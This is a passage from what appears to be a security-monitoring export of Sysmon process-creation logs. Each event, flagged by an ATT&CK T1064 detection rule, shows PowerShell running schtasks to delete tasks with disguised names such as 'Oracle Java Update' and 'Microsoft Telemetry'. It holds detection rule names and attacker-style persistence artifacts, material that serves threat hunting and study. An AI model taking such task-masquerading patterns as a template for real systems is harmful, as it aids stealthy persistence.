Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.353",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.097 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001085972100} +ProcessId: 696 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for products"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.104597800Z"",""eventRecordID"":""2795"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.097\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001085972100}\r\nProcessId: 696\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.097"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001085972100}"",""processId"":""696"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler 
Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for products\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.323",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.025 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00108b952100} +ProcessId: 876 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Products Reporter"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: 
{df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.030154900Z"",""eventRecordID"":""2794"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.025\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00108b952100}\r\nProcessId: 876\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: 
\""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.025"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00108b952100}"",""processId"":""876"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Products Reporter\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.298",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.978 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010c6932100} +ProcessId: 7248 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Spooler SubSystem Service"" /F 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.002279600Z"",""eventRecordID"":""2793"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.978\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010c6932100}\r\nProcessId: 7248\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.978"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010c6932100}"",""processId"":""7248"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Spooler SubSystem Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.244",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.934 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010b3912100} +ProcessId: 8188 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Microsoft Telemetry"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.937414800Z"",""eventRecordID"":""2792"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.934\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010b3912100}\r\nProcessId: 8188\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.934"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010b3912100}"",""processId"":""8188"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Microsoft Telemetry\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.215",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.883 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-001001902100} +ProcessId: 944 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java Update"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.901207400Z"",""eventRecordID"":""2791"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.883\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-001001902100}\r\nProcessId: 944\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.883"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-001001902100}"",""processId"":""944"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java Update\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.207",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.827 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-00102d8e2100} +ProcessId: 3908 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} 
+ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.832546600Z"",""eventRecordID"":""2790"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.827\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-00102d8e2100}\r\nProcessId: 3908\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo 
-NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.827"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-00102d8e2100}"",""processId"":""3908"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 